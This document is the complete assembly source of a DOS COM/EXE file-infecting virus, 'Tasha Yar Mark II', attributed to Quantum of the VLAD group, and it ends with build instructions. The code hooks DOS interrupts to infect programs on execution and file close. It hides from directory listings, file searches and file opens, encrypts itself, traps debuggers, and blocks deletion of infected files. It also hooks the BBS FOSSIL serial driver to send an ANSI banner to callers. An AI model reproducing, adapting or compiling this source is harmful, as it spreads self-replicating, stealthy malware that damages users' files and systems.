; ; TASHA YAR - MARK II ; by Quantum [VLAD] ; ; A Com/Exe Infector.. Infects on Execute and stream closes ; ; Utilises FULL stealth, dir stealth & search stealth. ; (and some petty other stealth tricks that aren't worth mentioning) ; ; uses a tbclean debugger trap, undetectable encryption & residency check ; all in 1.. (look at da code :) ; ; contains a (sorta) payload....... ; ; The fossil driver infector - aimed at BBS's int 14 is taken over and on ; detection of carrier an ANSI is sent out to the user (not the sysop :) ; ; The Homicide Prevention Squad - Fixes the "delete and forget" problem by ; making it impossible to "delete" an infected exe/com ; ; To those of you that gimme shit about size considerations.. if you can ; find someone who notices that their fav exe/com suddenly gets bigger ; (when they can't even see the size increase) and decides to delete it ; (lotsa luck there buddy) then ............ ; ------------------------------------------------------------------------ ; ; A word of warning.. this is not a good virus to "test" .. wanna say good-bye ; to your HDD ? just make a few test exe's and com's like I did and try ; infecting them.. hang on a tic.. what's dos doing ? it's reloading ; command.com from disk ! that's not good.. I'll just have a look to see if ; command.com is infected.. nope.. wait a minute.. dir/search/full stealth ; I know! .. I'll just use my trusty backup util/tape drive.. wait up.. ; attribute/datetime stealth.. ; oh shit.. now where'd I put that boot disk ? ; ; BTW - Compile with TASM /m2 .. Tlink to exe.. DOSSEG .model small .stack .code hostcodestart: mov ax,04c00h int 21h hostcodeend: virusstart: push es call recalc recalc: mov si,sp mov bp,ss:[si] sub bp,offset recalc push es push cs push cs pop ds pop es lea si,[bp+startenc] lea di,[bp+startenc] xor dx,dx mov ax,1812h int 21h xor al,byte ptr [bp+encbyte] xchg ah,al call encdecrypt jmp startenc encbyte: db 0h jumpsave: dd 0 stacksave: dd 0 encdecrypt: mov cx,endenc-startenc encloop:lodsb xor al,ah stosb loop encloop ret startenc: in al,40h mov byte ptr [bp+encbyte],al pop es or dx,dx jnz backtohost mov ax,es dec ax mov ds,ax cmp byte ptr ds:[0],"Z" jnz backtohost mov si,21h*4 sub word ptr ds:[3],(virusend-virusstart)/2 ; need room for buffer sub word ptr ds:[12h],(virusend-virusstart)/2 mov ax,word ptr ds:[12h] mov es,ax xor ax,ax mov ds,ax push es push cs pop es lea di,[bp+oldint21] movsw movsw pop es mov word ptr ds:[si-4],int21handler-virusstart mov word ptr ds:[si-2],es push ds mov ah,4 xor dx,dx int 14h pop ds cmp ax,1954h jnz nofossil push es push cs pop es mov si,14h*4 lea di,[bp+oldint14off] movsw movsw pop es mov word ptr ds:[si-4],startint14-virusstart mov word ptr ds:[si-2],es nofossil: push cs pop ds lea si,[bp+virusstart] xor di,di mov cx,virusend-virusstart rep movsb backtohost: pop es push cs pop ds cmp byte ptr [bp+comorexe],0 jnz comreturn mov ax,es add ax,10h lea di,[bp+jumpsave+2] ; return for exes add [di],ax cli add ax,[di+4] mov ss,ax mov sp,[di+6] sti jmp $+2 jmp dword ptr cs:[bp+jumpsave] comorexe: db 0 comreturn: push cs pop es lea si,[bp+virusstart-3] mov di,0100h ; return for coms push di movsb movsw ret db "[Tasha Yar] by Quantum / VLAD" StartInt14: mov cs:[cur_function-virusstart],ah mov cs:[cur_port-virusstart],dx pushf db 09ah ; fossil driver payload oldint14off dw 0 oldint14seg dw 0 cmp byte ptr cs:[cur_function-virusstart],03h jz checkDCD iret checkDCD: push ax and al,10000000b cmp al,cs:[dcdstat-virusstart] jz nochange mov cs:[dcdstat-virusstart],al or al,al jz nochange call outtext nochange: pop ax iret outtext: push ax push bx push cx push dx push es push di mov ah,19h push cs pop es mov di,textblock-virusstart mov cx,endblock-textblock mov dx,cs:[cur_port-virusstart] int 14h pop di pop es pop dx pop cx pop bx pop ax ret cur_port: dw 0 cur_function: db 0 dcdstat: db 0 EndInt14: int21handler: cmp ax,1812h jnz notserv xor al,al mov dx,4310h iret notserv: cmp ah,4bh jz executing cmp ah,6ch jz xtendopening cmp ah,3dh jz opening cmp ah,11h jz diring cmp ah,12h jz diring cmp ah,4eh jz searching cmp ah,4fh jz searching cmp ah,3eh jz closing cmp ah,13h jnz playoldint jmp deleteing playoldint: db 0eah oldint21 dd 0 executing: call pushall call isitexe jnz notexe call infectexe jmp aftexec notexe: call isitcom jnz aftexec call infectcom aftexec: call popall jmp playoldint diring: call callit pushf call pushall call dirstealth call popall popf retf 2 searching: call callit pushf call pushall call searchstealth call popall popf retf 2 xtendopening: call pushall mov ax,03d02h mov dx,si call callit pushf xchg bx,ax mov ah,3eh call callit popf jc notfukable jmp opennotpush notfukable: call popall jmp playoldint opening: call pushall opennotpush: call isitexe jnz notexe1 call disinfectexe jmp notcom1 notexe1: call isitcom jnz notcom1 call disinfectcom notcom1: call popall jmp playoldint closing: call pushall cmp bx,5 ; so sue me.. jb notexe2 push bx mov ax,1220h int 2fh xor bx,bx mov bl,es:[di] mov ax,1216h int 2fh pop bx push es pop ds cmp byte ptr [di+2ah],"M" jnz notcom2 mov word ptr [di+2h],02h call infectcomonclose jmp aftreinfect notcom2: cmp byte ptr [di+2ah],"E" jnz notexe2 mov word ptr [di+2h],02h call infectexeonclose aftreinfect: call popall retf 2 notexe2: call popall jmp playoldint deleteing: ; HPS call pushall mov si,dx cmp byte ptr [si],0ffh jnz notxtended1 add si,7 notxtended1: inc si push cs pop es mov di,offset filename-virusstart movsw movsw movsw movsw mov al,"." stosb movsw movsb xor ax,ax stosb push cs pop ds mov ah,2fh call callit push es push bx mov dx,offset dta - virusstart mov ah,1ah call callit mov ah,04eh xor cx,cx ; allow for wild cards.. mov dx,offset filename - virusstart ; ends up not deleting int 21h ; any file specified if jc notinfected ; it has the tag even if ; it isnt a com/exe and checkfile: ; bombs out as soon as it ; finds one.. mov ax,03d00h mov dx,offset dta - virusstart +1eh call callit xchg bx,ax mov ax,04202h xor cx,cx xor dx,dx int 21h sub ax,2 sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit mov ah,3fh mov cx,2 mov dx,offset buffer - virusstart call callit mov ah,3eh call callit cmp word ptr ds:[offset buffer-virusstart],"@!" jz itsinfected mov ah,04fh mov dx,offset filename - virusstart call callit jnc checkfile notinfected: pop dx pop ds mov ah,1ah call callit call popall jmp playoldint itsinfected: pop dx pop ds mov ah,1ah call callit call popall clc xor ax,ax retf 2 ; some useful functions callit: pushf call dword ptr cs:[oldint21-virusstart] ret pushall: pop word ptr cs:[save-virusstart] push ax push bx push cx push dx push si push di push bp push ds push es push word ptr cs:[save-virusstart] ret save: dw 0 popall: pop word ptr cs:[save-virusstart] pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax push word ptr cs:[save-virusstart] ret lseeks: xor ax,ax jmp lseek lseeke: mov al,02h lseek: mov ah,042h xor cx,cx xor dx,dx call callit ret isitexe: mov si,dx findend1: lodsb or al,al jnz findend1 cmp byte ptr ds:[si-2],"E" jz kewl1 cmp byte ptr ds:[si-2],"e" kewl1: ret isitcom: mov si,dx findend2: lodsb or al,al jnz findend2 cmp byte ptr ds:[si-2],"M" jz kewl2 cmp byte ptr ds:[si-2],"m" kewl2: ret isitinfected: call lseeke sub ax,2 sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit mov ah,3fh mov cx,2 mov dx,buffer-virusstart call callit cmp word ptr ds:[buffer-virusstart],"@!" ret ; low level call structures.. dirstealth: mov ah,2fh call callit push es pop ds cmp byte ptr [bx],0ffh jnz notxtended add bx,7 notxtended: xor bp,bp cmp word ptr ds:[bx+0ah],"EX" jz openher1 cmp word ptr ds:[bx+0ah],"MO" jnz nogo1 mov bp,3 openher1: mov si,bx push si push es push cs pop es mov di,filename-virusstart inc si movsw movsw movsw movsw mov al,"." stosb movsw movsb mov al,0 stosb mov dx,filename-virusstart pop es pop si push cs pop ds mov ax,03d00h call callit xchg ax,bx call isitinfected jnz tiskewl1 add bp,virusend-virusstart sub word ptr es:[si+1dh],bp sbb word ptr es:[si+1dh+2],0 tiskewl1: mov ah,3eh call callit nogo1: ret searchstealth: mov ah,2fh call callit push es pop ds xor bp,bp mov dx,bx add dx,1eh call isitexe jz openher2 call isitcom jnz nogo2 mov bp,3 openher2: xchg bx,si mov ax,03d00h call callit push cs pop ds xchg ax,bx push si call isitinfected pop si jnz tiskewl2 add bp,virusend-virusstart sub word ptr es:[si+1ah],bp sbb word ptr es:[si+1ah+2],0 tiskewl2: mov ah,3eh call callit nogo2: ret disinfectcom: mov ax,4301h xor cx,cx call callit mov ax,03d02h call callit xchg bx,ax mov ax,05700h call callit push cx push dx call isitinfected jnz closeandgo call lseeke sub ax,virusend-virusstart+3 sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit push cs pop ds mov ah,03fh mov cx,3 mov dx,buffer - virusstart call callit call lseeks mov cx,3 mov dx,buffer - virusstart mov ah,40h call callit call lseeke sub ax,virusend-virusstart+3 sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit xor cx,cx mov ah,40h call callit closeandgo: pop dx pop cx mov ax,5701h call callit mov ah,03eh call callit ret disinfectexe: mov ax,4301h xor cx,cx call callit mov ax,03d02h call callit xchg bx,ax mov ax,05700h call callit push cx push dx call isitinfected jnz itsnotinfected call lseeke sub ax,jumpsave-virusend sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit mov ah,3fh mov cx,8 mov dx,buffer-virusstart call callit mov ax,04200h xor cx,cx mov dx,14h call callit mov cx,4 mov dx,buffer-virusstart mov ah,40h call callit mov ax,04200h xor cx,cx mov dx,0eh call callit mov cx,4 mov dx,buffer-virusstart + 4 mov ah,040h call callit call lseeke sub ax,virusend-virusstart + 3 sbb dx,0 mov cx,dx mov dx,ax mov ax,04200h call callit xor cx,cx mov ah,40h call callit itsnotinfected: pop dx pop cx mov ax,05701h call callit mov ah,03eh call callit itsnotanexe: ret infectexe: mov ax,4301h xor cx,cx call callit mov ax,03d02h call callit xchg bx,ax infectexeonclose: mov ax,05700h call callit push cx push dx push cs push cs pop es pop ds mov ah,03fh mov cx,18h mov si,(exeheader-virusstart) mov dx,si call callit mov di,(jumpsave-virusstart) mov ax,[si+14h] stosw mov ax,[si+16h] stosw mov ax,[si+0eh] stosw mov ax,[si+10h] stosw call lseeke mov cx,16 DIV cx add dx,20h dec ax dec ax jc closefile sub ax,[si+08h] mov [si+14h],dx mov [si+16h],ax call isitinfected jz closefile mov byte ptr ds:[comorexe-virusstart],0 push ds push cs push cs pop ds pop es push si mov ah,40h mov cx,startenc-virusstart xor dx,dx call callit mov si,startenc-virusstart mov di,virusend-virusstart push di mov ah, byte ptr ds:[encbyte-virusstart] call encdecrypt mov ah,040h mov cx,endenc-startenc pop dx call callit mov ah,40h mov cx,virusend-endenc mov dx,endenc-virusstart call callit pop si pop ds call lseeke mov cx,512 DIV cx inc ax mov [si+2],dx mov [si+4],ax mov [si+0eh],ax mov [si+10h],0400h call lseeks mov cx,18h mov dx,si mov ah,40h call callit closefile: pop dx pop cx mov ax,05701h call callit mov ah,03eh call callit ret infectcom: mov ax,4301h xor cx,cx call callit mov ax,03d02h call callit xchg bx,ax infectcomonclose: mov ax,05700h call callit push cx push dx call isitinfected jz closecomfile call lseeks push cs pop ds mov ah,3fh mov cx,3 mov dx,(buffer-virusstart) call callit call lseeke mov byte ptr ds:[buffer-virusstart+4],0e9h mov word ptr ds:[buffer-virusstart+5],ax call lseeks mov ah,040h mov cx,3 mov dx,(buffer-virusstart+4) call callit call lseeke mov ah,40h mov cx,3 mov dx,(buffer-virusstart) call callit mov byte ptr ds:[comorexe-virusstart],1 mov ah,40h mov cx,startenc-virusstart xor dx,dx call callit push cs push cs pop ds pop es mov si,startenc-virusstart mov di,virusend-virusstart push di mov ah,byte ptr ds:[encbyte-virusstart] call encdecrypt mov ah,040h mov cx,endenc-startenc pop dx call callit mov ah,40h mov cx,virusend-endenc mov dx,endenc-virusstart call callit closecomfile: pop dx pop cx mov ax,05701h call callit mov ah,03eh call callit ret buffer: db 0,0,0 filename: exeheader: db 18h dup (0) textblock: ; the ansi db 0, 27, 91, 63, 55, 104, 27, 91, 52, 48, 109 db 109, 27, 91, 50, 74, 27, 91, 53, 67, 27, 91 db 91, 48, 59, 49, 109, 219, 219, 219, 219, 219, 219 db 219, 219, 32, 220, 219, 219, 219, 219, 219, 220, 32 db 32, 220, 219, 219, 219, 219, 219, 220, 32, 219, 219 db 219, 32, 32, 32, 219, 219, 32, 220, 219, 219, 219 db 219, 219, 219, 220, 27, 91, 54, 67, 219, 219, 32 db 32, 32, 32, 219, 219, 32, 220, 219, 219, 219, 219 db 219, 219, 220, 32, 219, 219, 219, 219, 219, 219, 220 db 220, 13, 10, 27, 91, 55, 67, 222, 219, 221, 32 db 32, 32, 32, 219, 219, 220, 220, 220, 219, 219, 32 db 32, 219, 219, 220, 220, 220, 220, 32, 32, 219, 219 db 219, 220, 220, 220, 219, 219, 32, 219, 219, 220, 220 db 220, 220, 219, 219, 27, 91, 54, 67, 219, 219, 220 db 220, 32, 220, 219, 219, 32, 219, 219, 220, 220, 220 db 220, 219, 219, 32, 219, 219, 32, 32, 32, 219, 219 db 219, 13, 10, 27, 91, 55, 67, 222, 219, 221, 32 db 32, 32, 32, 219, 219, 223, 223, 223, 219, 219, 32 db 32, 32, 223, 223, 223, 223, 219, 219, 32, 219, 219 db 219, 223, 223, 223, 219, 219, 32, 219, 219, 223, 223 db 223, 223, 219, 219, 27, 91, 55, 67, 223, 219, 219 db 219, 219, 223, 32, 32, 219, 219, 223, 223, 223, 219 db 219, 219, 32, 219, 219, 219, 219, 219, 219, 13, 10 db 10, 27, 91, 55, 67, 222, 219, 221, 32, 32, 32 db 32, 219, 219, 32, 32, 32, 219, 219, 32, 223, 219 db 219, 219, 219, 219, 219, 223, 32, 219, 219, 32, 32 db 32, 32, 219, 219, 32, 219, 219, 32, 32, 32, 219 db 219, 219, 27, 91, 56, 67, 222, 219, 221, 32, 32 db 32, 32, 219, 219, 32, 32, 32, 219, 219, 32, 219 db 219, 219, 32, 32, 223, 219, 219, 13, 10, 27, 91 db 91, 50, 54, 67, 80, 114, 111, 117, 100, 108, 121 db 121, 32, 80, 114, 101, 115, 101, 110, 116, 101, 100 db 100, 32, 98, 121, 32, 81, 117, 97, 110, 116, 117 db 117, 109, 27, 91, 48, 109, 13, 10 endblock: endenc: tag db "!@" dta: virusend: end virusstart